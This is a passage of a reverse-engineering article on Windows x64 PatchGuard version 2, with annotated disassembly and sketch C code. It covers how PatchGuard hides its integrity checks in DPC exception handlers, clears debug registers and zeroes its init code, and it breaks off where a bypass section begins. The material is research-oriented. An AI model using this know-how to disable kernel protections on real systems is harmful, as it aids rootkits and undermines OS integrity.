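+     * A legitimate caller treats DeferredContext as a pointer to its own
+     * context structure.  PatchGuard instead supplies a non-canonical
+     * value here, so in its case this first dereference raises an
+     * exception that is routed to the DPC routine's exception handlers.
+     */
+    Cookie = *(ULONG_PTR *)DeferredContext;
+    UNREFERENCED_PARAMETER(Cookie);
+}
+
+VOID
+QueueOneShotDpc(
+    IN PVOID DeferredContext
+    )
+{
+    LARGE_INTEGER DueTime;
+
+    /*
+     * A negative due time is relative to the current time and is given
+     * in 100 nanosecond units; this requests a single firing roughly
+     * five minutes (300 seconds) from now.
+     */
+    DueTime.QuadPart = -(300LL * 10 * 1000 * 1000);
+
+    KeInitializeDpc(&g_Dpc, SampleDeferredRoutine, DeferredContext);
+    KeInitializeTimerEx(&g_Timer, NotificationTimer);
+    KeSetTimer(&g_Timer, DueTime, &g_Dpc);
+}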

The prototype for a DPC routine is described by PKDEFERRED_ROUTINE:

typedef
VOID
(*PKDEFERRED_ROUTINE) (
    IN struct _KDPC *Dpc,      // pointer to parent DPC
    IN PVOID DeferredContext,  // arbitrary context - assigned at DPC initialization
    IN PVOID SystemArgument1,  // arbitrary context - assigned when DPC is queued
    IN PVOID SystemArgument2   // arbitrary context - assigned when DPC is queued
    );

Essentially, a DPC is a callback routine with a set of user-defined context
parameters whose interpretation is entirely up to the DPC routine itself.
Context arguments in callback functions are typically used to point to a
larger structure which contains the information necessary for the callback
routine to function, and this is exactly how the ten DPC routines that can be
used by PatchGuard regard the DeferredContext argument during legitimate
execution.  It is this usage of the DeferredContext argument which allows
PatchGuard to trigger its execution for each of the ten DPC routines via an
exception; PatchGuard arranges for a bogus DeferredContext value to be passed
to the DPC routine when it is called.  The first time that the DPC routine
tries to dereference the DPC-specific structure referred to by
DeferredContext, an exception occurs (which transfers control to the
exception dispatching system, and eventually to PatchGuard's integrity check
routine).  While this may seem simple at first, this description should set
off a couple of red flags for any reader familiar with kernel mode
programming; normally, it is not possible to catch bogus memory references at
DISPATCH_LEVEL or above with SEH (usually, one of the
PAGE_FAULT_IN_NON_PAGED_AREA or IRQL_NOT_LESS_OR_EQUAL bugchecks will be
raised, depending on whether the bogus reference was to a reserved non-paged
region or a paged-out pageable memory region).  As a result, one would expect
that PatchGuard would be putting the system at risk of randomly bugchecking
by passing bogus pointers that are referenced at DISPATCH_LEVEL, the IRQL at
which DPC routines run.  However, PatchGuard has a couple of tricks up its
metaphorical sleeve.  It takes advantage of an implementation-specific detail
of the current generation of x64 processors shipped by AMD in order to form
kernel mode addresses that, while bogus, will not result in a page fault when
referenced.  Instead, these bogus addresses will result in a general
protection fault, which eventually manifests itself as a
STATUS_ACCESS_VIOLATION SEH exception.  This path to raising a
STATUS_ACCESS_VIOLATION exception does in fact work even at DISPATCH_LEVEL,
thus allowing PatchGuard to provide safe bogus pointer values for the
DeferredContext argument in order to trigger SEH dispatching without risking
bringing the system down with a bugcheck.

Specifically, the implementation detail that PatchGuard relies upon relates to
the 48-bit address space limitation in AMD's Hammer family of processors[4].
Current AMD processors only implement 48 bits of the 64-bit address space
presented by the x64 architecture.  This is accomplished by requiring that
bits 63 through the most significant implemented bit (bit 47 on current AMD
processors) of any given address be set to either all ones or all zeros.  An
address of this form is defined to be a canonical address, or a well-formed
address.
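Concretely, with 48 implemented address bits the canonicality test reduces to
checking that bits 63 through 47 are uniform.  A small illustrative helper
(not taken from PatchGuard or the kernel):

//
// Returns TRUE if Va is canonical on a processor implementing 48 bits of
// virtual address space; bits 63:47 must be either all ones or all zeros.
//
BOOLEAN
IsCanonicalAddress48(
    IN ULONGLONG Va
    )
{
    ULONGLONG UpperBits = Va >> 47;     // bits 63:47, seventeen bits in total

    return (BOOLEAN)(UpperBits == 0 || UpperBits == 0x1FFFF);
}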
Attempts to reference addresses that are +not canonical as defined by this definition result in the processor +immediately raising a general protection fault. This restriction on the +address space essentially splits the usable address space into two halves; one +region at the high end of the address space, and one region at the low end of +the address space, with a no-mans-land in between the two. Windows utilizes +this split to divide user mode from kernel mode, with the high end of the +address space being reserved for kernel mode usage and the low end of the +address space being reserved for user mode usage. PatchGuard takes advantage +of this processor-mandated no-mans-land to create bogus pointer values that +can be safely dereferenced and caught by SEH, even at high IRQLs. + +All of the DPC routines that are in the set which may be repurposed for use by +PatchGuard dereference the DeferredContext argument as the first part of work +that does not involve shuffling stack variables around. In other words, the +first real work involved in any of the PatchGuard-enabled DPC routines is to +touch a structure or variable pointed to by the DeferredContext argument. In +the execution path of PatchGuard attempting to trigger a system integrity +check, the DeferredContext argument is invalid, which eventually results in +an access violation exception that is routed to the SEH registrations for the +DPC routine. If one examines any of the PatchGuard DPC routines, it is clear +that all of them have several overlapping SEH registrations (a construct that +normally indicates several levels of nested try/except and try/finally +constructs): + +1: kd> !fnseh nt!ExpTimeRefreshDpcRoutine +nt!ExpTimeRefreshDpcRoutine Lc8 0A,02 [EU ] nt!_C_specific_handler (C) +> fffff8000100358a La (fffff8000112c830 -> fffff80001000000) +> fffff8000100358a Lc (fffff8000112c870 -> fffff80001003596) +> fffff8000100358a L16 (fffff8000112c8a0 -> fffff80001000000) +> fffff8000100358a L18 (fffff8000112c8f0 -> fffff800010035a2) + +These SEH registrations are integral to the operation of PatchGuard's system +integrity checks. The specifics of how each handler registration work differ +for each DPC routine (in an attempt to frustrate attempts to reverse engineer +them), but the general idea is that each registered handler performs a portion +of the work necessary to set up a call to the PatchGuard integrity check +routine. This work is divided up among four different exception/unwind +handlers in an effort to make it difficult to understand what is going on, but +ultimately the end result is the same for each of the DPC routines; one of the +exception/unwind handlers ends up making a direct call to the system integrity +check decryption stub in-memory. The decryption stub decrypts itself, and +then decrypts the PatchGuard check routine, following with a transfer of +control to the integrity check routine so that PatchGuard can inspect various +protected registers, MSRs, and kernel images (such as the kernel itself) for +unauthorized modification. + +Additionally, all of the PatchGuard DPCs have been enhanced to obfuscate the +DPC routine arguments in stack variables (whose exact stack displacement +varies from DPC routine to DPC routine, and furthermore between kernel flavor +to kernel flavor; for example, the multiprocessor and uniprocessor kernel +builds have different stack frame layouts for many of the PatchGuard DPC +routines). 
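At the source level, the pattern that produces this layout is a DPC body
wrapped in nested try constructs whose scope handlers end up doing
PatchGuard's work.  The following is a purely schematic reconstruction for
illustration (the names are invented, and the filter body, which is where the
call into the decryption stub would ultimately be staged, is not shown):

LONG
SchematicPgFilter(
    IN PEXCEPTION_POINTERS ExceptionPointers,
    IN OUT PULONG State
    );

VOID
SchematicPgDpcRoutine(
    IN struct _KDPC *Dpc,
    IN PVOID DeferredContext,
    IN PVOID SystemArgument1,
    IN PVOID SystemArgument2
    )
{
    ULONG State = 0;        // analogous to the [rsp+20h] state variable

    UNREFERENCED_PARAMETER(Dpc);
    UNREFERENCED_PARAMETER(SystemArgument1);
    UNREFERENCED_PARAMETER(SystemArgument2);

    __try
    {
        __try
        {
            //
            // First dereference of DeferredContext.  Harmless for a
            // legitimate invocation; for a PatchGuard invocation the
            // pointer is non-canonical and the read raises an access
            // violation that enters the scope handlers below.
            //
            (VOID)*(volatile ULONG *)DeferredContext;

            //
            // ... the DPC routine's legitimate work would follow here ...
            //
        }
        __finally
        {
            State += 7;     // each scope handler nudges the state variable
        }
    }
    __except (SchematicPgFilter(GetExceptionInformation(), &State))
    {
        //
        // Reached only on the PatchGuard path, after the filter above has
        // returned EXCEPTION_EXECUTE_HANDLER.
        //
        NOTHING;
    }
}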
Recall that in the x64 calling convention, the first four +arguments are passed via registers (rcx, rdx, r8, and r9 respectively). Each +PatchGuard DPC routine takes special care to save away significant register +arguments onto the stack (in an obfuscated form). Several of the arguments +remain obfuscated until just before the decryption stub for the system +integrity check routine is called, in an effort to make it difficult for third +parties to patch into the middle of a particular DPC routine and easily access +the original arguments to the DPC. This is presumably designed in an attempt +to make it more difficult to differentiate DPC invocations that perform the +DPC routine's legitimate function from DPC invocations that will call +PatchGuard. It also makes it difficult, though not impossible, for a third +party to recover the original arguments to the DPC routine from the context of +any of the exception handlers registered to the DPC routine in a generalized +fashion. + +This obfuscation of arguments can be clearly seen by disassembling any of the +PatchGuard DPC routines. For example, when looking at +ExpTimeRefreshDpcRoutine, one can see that the routine saves away the Dpc +(rcx) and DeferredContext (rdx) arguments on the stack, rotates them by a +magical constant (this constant differs for each DPC routine flavor and is +used to further complicate the task of recovering the original DPC arguments +in a generalized fashion), and then overwrites the original argument +registers: + +0: kd> uf nt!ExpTimeRefreshDpcRoutine +; +; On entry, we have the following: +; +; rcx -> Dpc +; rdx -> DeferredContext (if this is being called for +; PatchGuard, then DeferredContext +; is a bogus kernel pointer). +; r8 -> SystemArgument1 +; r9 -> SystemArgument2 +; +nt!ExpTimeRefreshDpcRoutine: +; +; r11 is used as an ephemeral frame pointer here. +; +; Ephemeral frame pointers are an x64-specific compiler +; construct, wherein a volatile register is used as a +; frame pointer until the first function call is made. +; +fffff800`01003540 4c8bdc mov r11,rsp +fffff800`01003543 4881ecc8000000 sub rsp,0C8h +fffff800`0100354a 4889642460 mov qword ptr [rsp+60h],rsp +; +; This DPC routine does not use SystemArgument1 or +; SystemArgument2. As a result, it is free to overwrite +; these argument registers immediately without preserving +; their value. +; +; r8 = Dpc +; rcx = Dpc +; rdx = DeferredContext +; +fffff800`0100354f 4c8bc1 mov r8,rcx +fffff800`01003552 4889542448 mov qword ptr [rsp+48h],rdx +; +; Set [rsp+20h] to zero. This is a state variable that is +; used by the exception/unwind scope handlers in order to +; coordinate the PatchGuard execution process across the +; set of four exception/unwind scope handlers associated +; with this section of code. +; +fffff800`01003557 4533c9 xor r9d,r9d +fffff800`0100355a 44894c2420 mov dword ptr [rsp+20h],r9d +; +; PatchGuard zeros out various key fields in the DPC. +; This is an attempt to make it difficult to locate the DPC +; in-memory from the context of an exception handler called +; when a PatchGuard DPC accesses the bogus DeferredContext +; argument. 
Specifically, PatchGuard zeros the Type and +; DeferredContext fields of the KDPC structure, shown below: +; +; 0: kd> dt nt!_KDPC +; +0x000 Type : UChar +; +0x001 Importance : UChar +; +0x002 Number : UChar +; +0x003 Expedite : UChar +; +0x008 DpcListEntry : _LIST_ENTRY +; +0x018 DeferredRoutine : Ptr64 +; +0x020 DeferredContext : Ptr64 Void +; +0x028 SystemArgument1 : Ptr64 Void +; +0x030 SystemArgument2 : Ptr64 Void +; +0x038 DpcData : Ptr64 Void +; +; Dpc->Type = 0 +; +fffff800`0100355f 448809 mov byte ptr [rcx],r9b +; +; Dpc->DeferredContext = 0 +; +fffff800`01003562 4c894920 mov qword ptr [rcx+20h],r9 +; +; Here, the DPC loads [r11-20h] with an obfuscated +; copy of the DeferredContext argument (rotated +; left by 0x34 bits). +; +; Recall that rsp == r11+0xc8, so this location +; can also be aliased by [rsp+0A8h]. +; +; [rsp+0A8h] -> ROL(DeferredContext, 0x34) +; +fffff800`01003566 488bc2 mov rax,rdx +fffff800`01003569 48c1c034 rol rax,34h +fffff800`0100356d 498943e0 mov qword ptr [r11-20h],rax +; +; Similarly, the DPC loads [r11-48h] with an +; obfuscated copy of the Dpc argument (rotated +; right by 0x48 bits). +; +; This location may be aliased as [rsp+80h]. +; +; [rsp+80h] -> ROR(Dpc, 0x48) +; +fffff800`01003571 488bc1 mov rax,rcx +fffff800`01003574 48c1c848 ror rax,48h +fffff800`01003578 498943b8 mov qword ptr [r11-48h],rax +; +; The following register context is now in place: +; +; r8 = Dpc +; rcx = Dpc +; rdx = DeferredContext +; rax = ROR(Dpc, 0x48) +; [rsp+0A8h] = ROL(DeferredContext, 0x34) +; [rsp+80h] = ROR(Dpc, 0x48) +; +; The DPC routine destroys the contents of rcx by +; zero extending it with a copy of the low byte of +; the DeferredContext value. +; +fffff800`0100357c 0fb6ca movzx ecx,dl +; +; The DPC routine destroys the contents of r8 with +; a right shift (unlike a rotate, the incoming left +; bits are simply zero filled instead of set to the +; rightmost bits being shifted off. The rightmost +; bits are thus lost forever, destroying the r8 +; register as a useful source of the Dpc argument. +; +fffff800`0100357f 49d3e8 shr r8,cl +; +; r8 is saved away on the stack, but it is no longer +; directly useful as a way to locate the Dpc argument +; due to the destructive right shift above. +; +fffff800`01003582 4c898424d8000000 mov qword ptr [rsp+0D8h],r8 +; +; r8 = Dpc >> (UCHAR)DeferredContext +; rcx = (UCHAR)DeferredContext +; rdx = DeferredContext +; rax = ROR(Dpc, 0x48) +; [rsp+0A8h] = ROL(DeferredContext, 0x34) +; [rsp+80h] = ROR(Dpc, 0x48) +; +; Here, we temporarily deobfuscate the DeferredContext +; argument stored at [r11-20h] above. In this particular +; instance, rdx also happens to contain the deobfuscated +; DeferredContext value, but not all instances of +; PatchGuard's DPC routines share this property of +; retaining a plaintext copy of DeferredContext in rdx. +; +fffff800`0100358a 498b43e0 mov rax,qword ptr [r11-20h] +fffff800`0100358e 48c1c834 ror rax,34h +; +; Now, we have the following context in place: +; +; r8 = Dpc >> (UCHAR)DeferredContext +; rcx = (UCHAR)DeferredContext +; rdx = DeferredContext (* But not valid for +; all DPC routines.) +; rax = DeferredContext +; [rsp+0A8h] = ROL(DeferredContext, 0x34) +; [rsp+80h] = ROR(Dpc, 0x48) +; +; The next step is to dereference the DeferredContext value. +; For a legitimate DPC invocation, this operation is harmless; +; the DeferredContext value would point to valid kernel memory. 
;
; For PatchGuard, however, this triggers an access violation
; that winds up with control being transferred to the exception
; handlers registered to the DPC routine.
;
fffff800`01003592 8b00            mov     eax,dword ptr [rax]

At this point, it is necessary to investigate the various exception/unwind
handlers registered to the DPC routine in order to determine what happens
next.  Most of these handlers can be skipped as they are nothing more than
minor layers of obfuscation that, while differing significantly between each
DPC routine, have the same end result.  One of the exception/unwind handlers,
however, makes the call to PatchGuard's integrity check, and this handler is
worthy of further discussion.  Because the exception registrations for all of
the PatchGuard DPC routines make use of nt!_C_specific_handler, the scope
handlers conform to a standard prototype, defined below:

//
// Define the standard type used to describe a C-language exception handler,
// which is used with _C_specific_handler.
//
// The actual parameter values differ depending on whether the low byte of the
// first argument contains the value 0x1.  If this is the case, then the call
// is to the unwind handler for the routine; otherwise, the call is to the
// exception handler for the routine.  Each routine has fairly different
// interpretations for the two arguments, though the prototypes are, as far
// as calling conventions go, compatible.
//

typedef
LONG
(NTAPI * PC_LANGUAGE_EXCEPTION_HANDLER)(
    __in PEXCEPTION_POINTERS ExceptionPointers, // if low byte is 0x1, then we're an unwind
    __in ULONG64 EstablisherFrame               // faulting routine stack pointer
    );

In the case of nt!ExpTimeRefreshDpcRoutine, the fourth scope handler
registration is the one that performs the call to PatchGuard's integrity check
routine.  Here, the routine only executes the integrity check if a state
variable stored at [rsp+20h] in the DPC routine is set to a particular value.
This state variable is modified as the access violation exception traverses
each of the exception/unwind scope handlers until it reaches this handler,
which eventually leads up to the execution of PatchGuard's system integrity
check.  For now, it is best to assume that this routine is being called with
[rsp+20h] in the DPC routine having been set to 0x15; this value signifies
that PatchGuard should be executed.

0: kd> uf fffff8000112c8f0
nt!ExpTimeRefreshDpcRoutine+0x17f:
;
; mov eax, eax is a hotpatch stub and can be ignored.
;
fffff800`0112c8f0 8bc0            mov     eax,eax
fffff800`0112c8f2 55              push    rbp
fffff800`0112c8f3 4883ec20        sub     rsp,20h
;
; rdx corresponds to the EstablisherFrame argument.
; This argument is the stack pointer (rsp) value for
; the routine that this exception/unwind handler is
; associated with.  The typical use of this argument
; is to allow seamless access to local variables in
; the routine with which the try/except filter is
; associated.  This is what eventually ends up
; occurring here, with the rbp register being loaded
; with the stack pointer of the DPC routine at the
; point in time where the exception occurred.
;
fffff800`0112c8f7 488bea          mov     rbp,rdx
;
; We make the check against the state variable.
; Recall that when the DPC routine was first entered,
; [rsp+20h] in the DPC routine's context was set to
; zero.  That location corresponds to [rbp+20h] in
; this context, as rbp has been loaded with the stack
; pointer that was in use in the DPC routine.
This +; location is checked and altered by each of the +; registered exception/unwind handlers, and will +; eventually be set to 0x15 when this routine is called. +; +fffff800`0112c8fa 83452007 add dword ptr [rbp+20h],7 +fffff800`0112c8fe 8b4520 mov eax,dword ptr [rbp+20h] +fffff800`0112c901 83f81c cmp eax,1Ch +; +; For the moment, consider the case where this jump is +; not taken. The jump is taken when PatchGuard is not +; being executed (which is not the interesting case). +; +fffff800`0112c904 0f858c000000 jne nt!ExpTimeRefreshDpcRoutine+0x215 (fffff800`0112c996) + +nt!ExpTimeRefreshDpcRoutine+0x189: +; +; To understand the following instructions, it is +; necessary to look back at the stack variable context +; that was set up by the DPC routine prior to the +; faulting instruction that caused the access +; violation exception. The following values were +; set on the stack at that time: +; +; [rsp+0A8h] = ROL(DeferredContext, 0x34) +; [rsp+80h] = ROR(Dpc, 0x48) +; +; The following set of instructions utilize these +; obfuscated copies of the original arguments to the +; DPC routine in order to make the call to PatchGuard's +; integrity check routine. +; +; The first step taken is to deobfuscate the Dpc value +; that was stored at [rsp+80h], or [rbp+80h] as seen from +; this context. +; +fffff800`0112c90a 488b8580000000 mov rax,qword ptr [rbp+80h] +; +; rax = Dpc +; +fffff800`0112c911 48c1c048 rol rax,48h +; +; [rbp+50h] -> Dpc +; +fffff800`0112c915 48894550 mov qword ptr [rbp+50h],rax +; +; Next, the DeferredContext argument is deobfuscated and +; stored plaintext. +; +fffff800`0112c919 488b85a8000000 mov rax,qword ptr [rbp+0A8h] +; +; rax = DeferredContext +; +fffff800`0112c920 48c1c834 ror rax,34h +; +; [rbp+58h] -> DeferredContext +; +fffff800`0112c924 48894558 mov qword ptr [rbp+58h],rax +; +; rax = Dpc +; +fffff800`0112c928 488b4550 mov rax,qword ptr [rbp+50h] +; +; The next instruction accesses memory after the KDPC +; object in memory. Recall that a KDPC object is 0x40 +; bytes in length on x64, so [Dpc+40h] is the first +; value beyond the DPC in memory. In reality, the KDPC +; is a member of a larger structure, which is defined +; as follows: +; +; struct PATCHGUARD_DPC_CONTEXT { +; KDPC Dpc; // +0x00 +; ULONGLONG DecryptionKey; // +0x40 +; }; +; +; As a result, this instruction is equivalent to casting +; the Dpc argument to a PATCHGUARD_DPC_CONTEXT*, and then +; accessing the DecryptionKey member +; +; +; rcx = Dpc->DecryptionKey +; +fffff800`0112c92c 488b4840 mov rcx,qword ptr [rax+40h] +; +; [rbp+40h] -> DecryptionKey +; +fffff800`0112c930 48894d40 mov qword ptr [rbp+40h],rcx +; +; rax = DecryptionKey +; +fffff800`0112c934 488b4540 mov rax,qword ptr [rbp+40h] +; +; The DeferredContext value is then xor'd with the +; decryption key stored in the PATCHGUARD_DPC_CONTEXT +; structure. This yields the significant bits of the +; pointer to the PatchGuard decryption stub. Recall +; that due to the "no-mans-land" region in between the +; kernel mode and user mode address space boundaries +; on current AMD64 processors, the rest of the bits +; are required to be either all ones or all zeros in +; order to form a valid address. Because we are +; dealing with a kernel mode address, it can be safely +; assumed that all of the bits must be ones. 
+; +fffff800`0112c938 48334558 xor rax,qword ptr [rbp+58h] +; +; [rbp+30h] -> DeferredContext ^ DecryptionKey +; +fffff800`0112c93c 48894530 mov qword ptr [rbp+30h],rax +; +; Set the required bits to ones in the decrypted +; pointer, as required to form a canonical address on +; current AMD64 systems. +; +fffff800`0112c940 48b80000000000f8ffff mov rax,0FFFFF80000000000h +; +; [rbp+30h] -> [rbp+30h] | 0xFFFFF80000000000 +; +; Now, [rbp+30h] is the pointer to the decryption stub. +; +fffff800`0112c94a 48094530 or qword ptr [rbp+30h],rax +; +; The following instructions make extra copies of the decryption +; stub on the stack of the DPC routine. There is no real purpose +; to this, other than a half-hearted attempt to confuse anyone +; attempting to reverse engineer this section of PatchGuard. +; +; [rbp+38h] -> [rbp+30h] (Decryption stub) +; +fffff800`0112c94e 488b4530 mov rax,qword ptr [rbp+30h] +fffff800`0112c952 48894538 mov qword ptr [rbp+38h],rax +; +; [rbp+28h] -> [rbp+38h] (Decryption stub) +; +fffff800`0112c956 488b4538 mov rax,qword ptr [rbp+38h] +fffff800`0112c95a 48894528 mov qword ptr [rbp+28h],rax +; +; The next set of instructions rewrite the first +; four bytes of the initial opcode in the decryption +; stub. This opcode must be set to the following +; instruction: +; +; f0483111 lock xor qword ptr [rcx],rdx +; +; The individual opcode bytes for the instruction are +; written to the decryption stub one byte at a time. +; +; *(PULONG)DecryptionStub = 0x113148f0 +; +fffff800`0112c95e 488b4528 mov rax,qword ptr [rbp+28h] +fffff800`0112c962 c600f0 mov byte ptr [rax],0F0h +fffff800`0112c965 488b4528 mov rax,qword ptr [rbp+28h] +fffff800`0112c969 c6400148 mov byte ptr [rax+1],48h +fffff800`0112c96d 488b4528 mov rax,qword ptr [rbp+28h] +fffff800`0112c971 c6400231 mov byte ptr [rax+2],31h +fffff800`0112c975 488b4528 mov rax,qword ptr [rbp+28h] +fffff800`0112c979 c6400311 mov byte ptr [rax+3],11h +; +; Finally, a call to the decryption stub is made. The +; decryption stub has a prototype that conforms to the +; following definition: +; +; VOID +; NTAPI +; PgDecryptionStub( +; __in PVOID PatchGuardRoutine, +; __in ULONG64 DecryptionKey, +; __in ULONG Reserved0, +; __in ULONG Reserved1 +; ); +; +; The two 'reserved' ULONG values are always set to zero. +; +; rcx is loaded with the address of the decryption stub, +; and rdx is loaded with the DecryptionKey value. +; +fffff800`0112c97d 4533c9 xor r9d,r9d +fffff800`0112c980 4533c0 xor r8d,r8d +fffff800`0112c983 488b5540 mov rdx,qword ptr [rbp+40h] +fffff800`0112c987 488b4d38 mov rcx,qword ptr [rbp+38h] +; +; At this point, control is transferred to the decryption +; stub, as described previously. The decryption stub will +; decrypt itself, decrypt the PatchGuard integrity check +; routine, and then transfer control to the PatchGuard +; integrity check routine. The integrity check routine is +; responsible for ensuring that the DPC is returned to a +; usable state (recall that parts of it were zeroed out +; by the DPC routine earlier), and that it is re-queued +; for execution. It is also responsible for re-encrypting +; the decryption stub as desired. +; +fffff800`0112c98b ff5538 call qword ptr [rbp+38h] +; +; After the call is made, the exception filter returns +; the EXCEPTION_EXECUTE_HANDLER manifest constant. This +; causes one of the registered handlers to be invoked +; in order to handle the exception. 
The handler will +; transfer control to the return point of the DPC routine, +; thus skipping the body of the DPC (since the call to +; the DPC was not a request for the legitimate function of +; the DPC to be performed). +; +fffff800`0112c98e 41b901000000 mov r9d,1 +fffff800`0112c994 eb03 jmp nt!ExpTimeRefreshDpcRoutine+0x218 (fffff800`0112c999) + +nt!ExpTimeRefreshDpcRoutine+0x215: +fffff800`0112c996 4533c9 xor r9d,r9d + +nt!ExpTimeRefreshDpcRoutine+0x218: +fffff800`0112c999 418bc1 mov eax,r9d +fffff800`0112c99c 4883c420 add rsp,20h +fffff800`0112c9a0 5d pop rbp +fffff800`0112c9a1 c3 ret + +This does represent a significant level of obfuscation, but it is not +impenetrable, and there are various simple ways through which an attacker +could bypass all of these layers of obfuscation entirely. + +3.5) Disruption of Debug Register-Based Breakpoints + +PatchGuard version 2 attempts to protect itself from breakpoints that are set +using the hardware debug registers. These breakpoints operate by setting up +to four designated memory locations that are of interest. Each memory +location can be configured to cause a debug exception when it is read, +written, or executed. Because breakpoints of this flavor are not visible to +PatchGuard's code integrity checks (unlike conventional breakpoints, these +breakpoints do not involve int 3 (0xcc) opcodes being substituted for target +instructions), debug register-based breakpoints (sometimes known as ``memory +breakpoints'' or ``hardware breakpoints'') pose a threat to PatchGuard. +PatchGuard attempts to counter this threat by disabling all such debug +register-based breakpoints as a first step after the system integrity checking +routine has been decrypted in-memory: + +; +; Here, the second stage decryption sequence is +; set to run to decrypt the system integrity +; check routine. We step over the second stage +; decryption and examine the integrity check +; routine in its plaintext state... +; + +fffffadf`f6edc043 8b4a4c mov ecx,dword ptr [rdx+4Ch] +fffffadf`f6edc046 483144ca48 xor qword ptr [rdx+rcx*8+48h],rax +fffffadf`f6edc04b 48d3c8 ror rax,cl +fffffadf`f6edc04e e2f6 loop fffffadf`f6edc046 +fffffadf`f6edc050 8b8288010000 mov eax,dword ptr [rdx+188h] +fffffadf`f6edc056 4803c2 add rax,rdx +fffffadf`f6edc059 ffe0 jmp rax +fffffadf`f6edc05b 90 nop +; +; We set a breakpoint on the 'jmp rax' instruction +; above. This instruction is what transfers control +; to the system integrity check routine. +; +0: kd> ba e1 fffffadf`f6edc059 +0: kd> g +Breakpoint 2 hit +fffffadf`f6edc059 ffe0 jmp rax +; +; rax now points to the decrypted system +; integrity check routine in-memory. The +; first call it makes is to a routine whose +; purpose is to disable all debug register-based +; breakpoints by clearing the debug control +; register (dr7). Doing so effectively turns +; off all of the debug register breakpoints. +; +0: kd> u @rax +fffffadf`f6edd8de 4883ec78 sub rsp,78h +fffffadf`f6edd8e2 48895c2470 mov qword ptr [rsp+70h],rbx +fffffadf`f6edd8e7 48896c2468 mov qword ptr [rsp+68h],rbp +fffffadf`f6edd8ec 4889742460 mov qword ptr [rsp+60h],rsi +fffffadf`f6edd8f1 48897c2458 mov qword ptr [rsp+58h],rdi +fffffadf`f6edd8f6 4c89642450 mov qword ptr [rsp+50h],r12 +fffffadf`f6edd8fb 488bda mov rbx,rdx +fffffadf`f6edd8fe 4c896c2448 mov qword ptr [rsp+48h],r13 +0: kd> u +fffffadf`f6edd903 e8863a0000 call fffffadf`f6ee138e +; +; The routine simply writes all zeros to dr7. 
+; +0: kd> u fffffadf`f6ee138e +fffffadf`f6ee138e 33c0 xor eax,eax +fffffadf`f6ee1390 0f23f8 mov dr7,rax +fffffadf`f6ee1393 c3 ret + +3.6) Misleading Symbol Names + +One of the things that Microsoft needed to consider when implementing +PatchGuard is that would-be attackers would have access to the operating +system symbols. As a debugging aid, Microsoft makes symbols for the entire +operating system publicly available. It is not feasible to remove the +operating system symbols from public access (doing so would severely hinder +ISVs in the process of debugging their own drivers). As a result, Microsoft +took the route of using misleading function names to shroud PatchGuard +routines from casual inspection. Many of the internal PatchGuard routines +have names that are seemingly legitimate-sounding at first glance, such that +without a detailed knowledge of the kernel or actually inspecting these +routines, it would be difficult to simply look at a list of all symbols in the +kernel and locate the routines responsible for setting up PatchGuard. + +The following is a listing of some of the misleading symbols that are used +during PatchGuard initialization: + + 1. RtlpDeleteFunctionTable + 2. FsRtlMdlReadCompleteDevEx + 3. RtlLookupFunctionEntryEx + 4. SdbpCheckDll + 5. FsRtlUninitializeSmallMcb + 6. KiNoDebugRoutine + 7. SepAdtInitializePrivilegeAuditing + 8. KiFilterFiberContext + +3.7) Integrity Checks Performed During System Initialization + +During system initialization, PatchGuard performs integrity checks on several +of the anti-debug mechanisms it has in place. If these mechanisms are altered +on-disk, PatchGuard will detect the changes. For example, PatchGuard +validates that the routine responsible for clearing debug register-based +breakpoints contains the correct opcode bytes corresponding to the +instructions used to actually zero out Dr7: + +; +; Here, we are in SepAdtInitializePrivilegeAuditing, or the +; initialization routine for PatchGuard during system startup. +; +; This code fragment is designed to validate that the +; KiNoDebugRoutine routine contains the expected opcodes that +; are used to zero out debug register breakpoints. If the +; routine does not contain the correct opcodes, PatchGuard +; makes an early exit from SepAdtInitializePrivilegeAuditing. +; +INIT:0000000000832A6D lea rax, KiNoDebugRoutine +INIT:0000000000832A74 cmp dword ptr [rax], 230FC033h +INIT:0000000000832A7A jnz abort_initialization +INIT:0000000000832A80 add rax, 4 +INIT:0000000000832A84 cmp word ptr [rax], 0C3F8h +INIT:0000000000832A89 jnz abort_initialization + +3.8) Overwriting PatchGuard Initialization Code Post-Boot + +After PatchGuard has initialized itself, it intentionally zeros out much of +the code responsible for setting up PatchGuard. It is assumed that this is +done in an attempt to prevent third party drivers from analyzing kernel code +in-memory in order to detect or defeat PatchGuard. This approach is obviously +trivially bypassed by opening the kernel image on disk, however. 
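For reference, pulling bytes from the on-disk image out of a driver requires
nothing beyond the ordinary Zw file routines.  A minimal illustrative sketch
(must run at PASSIVE_LEVEL; error handling is compressed, and the path shown
assumes the booted kernel is actually named ntoskrnl.exe, which is not
guaranteed):

NTSTATUS
ReadKernelImageFromDisk(
    OUT PVOID Buffer,
    IN ULONG Length
    )
{
    UNICODE_STRING    Path = RTL_CONSTANT_STRING(
                                 L"\\SystemRoot\\System32\\ntoskrnl.exe");
    OBJECT_ATTRIBUTES Attributes;
    IO_STATUS_BLOCK   IoStatus;
    LARGE_INTEGER     ByteOffset;
    HANDLE            FileHandle;
    NTSTATUS          Status;

    InitializeObjectAttributes(&Attributes, &Path,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    Status = ZwOpenFile(&FileHandle, GENERIC_READ | SYNCHRONIZE, &Attributes,
        &IoStatus, FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);

    if (!NT_SUCCESS(Status))
        return Status;

    ByteOffset.QuadPart = 0;

    Status = ZwReadFile(FileHandle, NULL, NULL, NULL, &IoStatus, Buffer,
        Length, &ByteOffset, NULL);

    ZwClose(FileHandle);

    return Status;
}

Mapping file offsets onto the in-memory layout (and handling the kernel's
alternate image names) is additional work that is not shown here.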

After boot, many PatchGuard-related routines contain all zeros:

0: kd> u nt!KiNoDebugRoutine
nt!KiNoDebugRoutine:
fffff800`011a4b20 0000            add     byte ptr [rax],al

nt!FsRtlUninitializeSmallMcb:
fffff800`011a4aa2 0000            add     byte ptr [rax],al

0: kd> u nt!KiGetGdtIdt
nt!KiGetGdtIdt:
fffff800`011a4a20 0000            add     byte ptr [rax],al

0: kd> u nt!RtlpDeleteFunctionTable
nt!RtlpDeleteFunctionTable:
fffff800`011a1010 0000            add     byte ptr [rax],al

Most of the PatchGuard initialization code resides in the INITKDBG section of
ntoskrnl.  Portions of this section are zeroed out during initialization.

4) Bypass Techniques

Despite the myriad anti-reverse-engineering and anti-debug techniques employed
by PatchGuard version 2, it is hardly invulnerable to bypass by third party
code.  Contrary to what one might expect, given the descriptions in the
initial section of this article, there are a number of holes in PatchGuard's
armor that can be exploited by third party software.  Several potential
techniques for bypassing PatchGuard version 2 are outlined below, including
one technique for which functional proof of concept code is provided.  These
